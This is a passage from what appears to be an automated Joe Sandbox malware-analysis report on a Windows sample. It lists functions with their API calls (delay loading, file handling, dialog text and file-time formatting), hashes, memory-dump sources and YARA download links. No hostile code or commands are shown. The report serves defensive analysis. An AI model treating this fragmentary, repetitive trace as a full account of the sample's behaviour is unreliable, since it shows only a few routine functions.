                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0c9844e05995801c76050b4ed9b1deea4d4b949a05698f1894d2340519e1c0a9
                                                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                                                              • Opcode Fuzzy Hash: 0c9844e05995801c76050b4ed9b1deea4d4b949a05698f1894d2340519e1c0a9
                                                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                                                              Function 00CBE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 213f8d9ff39be79cf0b355aff9430b0d2ed54e2c38636a9f8bb09b5a5bb71606
                                                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                                                              • Opcode Fuzzy Hash: 213f8d9ff39be79cf0b355aff9430b0d2ed54e2c38636a9f8bb09b5a5bb71606
                                                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                                                              Function 00CBE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5d0008ad0ff9f0fd4a5faf5e4276b089044dcf1244e015eb9becf0c49004fc4b
                                                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                                                              • Opcode Fuzzy Hash: 5d0008ad0ff9f0fd4a5faf5e4276b089044dcf1244e015eb9becf0c49004fc4b
                                                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                                                              Function 00CBE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE3FC
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 375791acbd901921229ed4cc697bb686610555f912907224aaa4f1ec10d7218f
                                                                                              • Instruction ID: 4acc3b76ffa8c2a5053a67c09a9ba7558301284ad57c10c9220053264e6e2197
                                                                                              • Opcode Fuzzy Hash: 375791acbd901921229ed4cc697bb686610555f912907224aaa4f1ec10d7218f
                                                                                              • Instruction Fuzzy Hash: F1A011E22A8002BC3A0822022C82CFB028EC0C0F20B30882EF802800C0A8800C02A8B2
                                                                                              Function 00CBE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 383d09aea8e812e7d1d1031ad2acda3627c395fc0e6660175805973f032ec815
                                                                                              • Instruction ID: d91921d0ca807f8cf1c898191eee321ea1b230d7ffae67da977a4180c77f9060
                                                                                              • Opcode Fuzzy Hash: 383d09aea8e812e7d1d1031ad2acda3627c395fc0e6660175805973f032ec815
                                                                                              • Instruction Fuzzy Hash: 1AA022C22AC003BC3008A2A32C83CFB022EC8C0F28B30883FF802C00C0BC800C0AA830
                                                                                              Function 00CBE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 5425d6755c3d07953e31d84f111debf3f83f5ba115b4f706f404907cf3ab7b18
                                                                                              • Instruction ID: d91921d0ca807f8cf1c898191eee321ea1b230d7ffae67da977a4180c77f9060
                                                                                              • Opcode Fuzzy Hash: 5425d6755c3d07953e31d84f111debf3f83f5ba115b4f706f404907cf3ab7b18
                                                                                              • Instruction Fuzzy Hash: 1AA022C22AC003BC3008A2A32C83CFB022EC8C0F28B30883FF802C00C0BC800C0AA830
                                                                                              Function 00CBE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 17d5e0c9ebea5b0c4232d1d7a26509984aa9ec42566b66575831c4f3c2634cf2
                                                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                                                              • Opcode Fuzzy Hash: 17d5e0c9ebea5b0c4232d1d7a26509984aa9ec42566b66575831c4f3c2634cf2
                                                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                                                              Function 00CBE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 80da5aa758877faf645124b4c4c8c26570970392462f9e8a8b3c0d4af9edcae2
                                                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                                                              • Opcode Fuzzy Hash: 80da5aa758877faf645124b4c4c8c26570970392462f9e8a8b3c0d4af9edcae2
                                                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                                                              Function 00CBE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 0ea5218368610a893f85a77246e99de84cb9f58841312bf12c9089bd23bee1a0
                                                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                                                              • Opcode Fuzzy Hash: 0ea5218368610a893f85a77246e99de84cb9f58841312bf12c9089bd23bee1a0
                                                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                                                              Function 00CBE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE51F
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 1927e44403426dd47d8da2a9ad005236d3022cbc013fd68b0b357ac8fd759f3f
                                                                                              • Instruction ID: 9c2f1a747d95d5db2e4fb68c41e2aa7d8521b2fe92bb910dff2b6a39fcd51536
                                                                                              • Opcode Fuzzy Hash: 1927e44403426dd47d8da2a9ad005236d3022cbc013fd68b0b357ac8fd759f3f
                                                                                              • Instruction Fuzzy Hash: 16A011C22E8802BC3008220A2C02CFB020EC0C2F28B308A2EFA02800C0A8800C0AA832
                                                                                              Function 00CBE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00CBE580
                                                                                                • Part of subcall function 00CBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CBE8D0
                                                                                                • Part of subcall function 00CBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CBE8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              • Opcode ID: 3b9c5d61b8d515353725ac1827333834c26783c6152d7223111bd4ab58575cf7
                                                                                              • Instruction ID: 79400f077364a50ef3269ff85aa8dd20b0a00a644bb75bb539f8efdefedc21c5
                                                                                              • Opcode Fuzzy Hash: 3b9c5d61b8d515353725ac1827333834c26783c6152d7223111bd4ab58575cf7
                                                                                              • Instruction Fuzzy Hash: 8AA022C22E80023C3008A2B32C83CFB022EC8E0F2AB30823FF800C00C0BC800C0AA830
                                                                                              Function 00CA9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEndOfFile.KERNELBASE(?,00CA903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CA9F0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File
                                                                                              • String ID:
                                                                                              • API String ID: 749574446-0
                                                                                              • Opcode ID: 084e62841d435a3d00d22fbdd25d25702c87a077e3069c63b2dccf655ae24e8a
                                                                                              • Instruction ID: e24fc1b9fe3fdbc71dc480c0d785528c34f890b08a865e9e576637e73a010a50
                                                                                              • Opcode Fuzzy Hash: 084e62841d435a3d00d22fbdd25d25702c87a077e3069c63b2dccf655ae24e8a
                                                                                              • Instruction Fuzzy Hash: 67A0223008000E8BCE002B30CE0830C3B20FB20BC030082E8A00BCF0B2CB23880BCB22
                                                                                              Function 00CBAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,00CBAE72,C:\Users\user\Desktop,00000000,00CE946A,00000006), ref: 00CBAC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory
                                                                                              • String ID:
                                                                                              • API String ID: 1611563598-0
                                                                                              • Opcode ID: 19ed4050d8e8f5be59584b4c0446e8ae198553c793176a51599a52861a7d7142
                                                                                              • Instruction ID: 725f5fef40c77bdb342b9435135ca5cea3a2eecd6613c447e5b744bbd5a59583
                                                                                              • Opcode Fuzzy Hash: 19ed4050d8e8f5be59584b4c0446e8ae198553c793176a51599a52861a7d7142
                                                                                              • Instruction Fuzzy Hash: 4EA001712062829B96015B329F4AB4EBBAAAFA2B51F05C42AA54588170DB35C960AA16
                                                                                              Function 00CA9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(000000FF,?,?,00CA95D6,?,?,?,?,?,00CD2641,000000FF), ref: 00CA963B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 3717c3fb60f43547584ca069b8da434ec63245da59560cb402971ccf1eba4361
                                                                                              • Instruction ID: d4c90e78c9c44ed068a9d3052c694641cdd370292ad025d28c969608e0bb6e36
                                                                                              • Opcode Fuzzy Hash: 3717c3fb60f43547584ca069b8da434ec63245da59560cb402971ccf1eba4361
                                                                                              • Instruction Fuzzy Hash: E3F0E270082B469FDB308A20C549B92B7E8EF13329F081B1EE0F3429E0D3706ACD9A40

                                                                                              Non-executed Functions

                                                                                              Function 00CBC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CBC2B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 00CBC2C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00CBC2E0
                                                                                              • SetFocus.USER32(00000000), ref: 00CBC2E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CBC321
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CBC358
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00CBC36E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CBC38C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CBC39C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CBC3B8
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CBC3D4
                                                                                              • _swprintf.LIBCMT ref: 00CBC404
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CBC417
                                                                                              • FindClose.KERNEL32(00000000), ref: 00CBC41E
                                                                                              • _swprintf.LIBCMT ref: 00CBC477
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CBC48A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CBC4A7
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CBC4C7
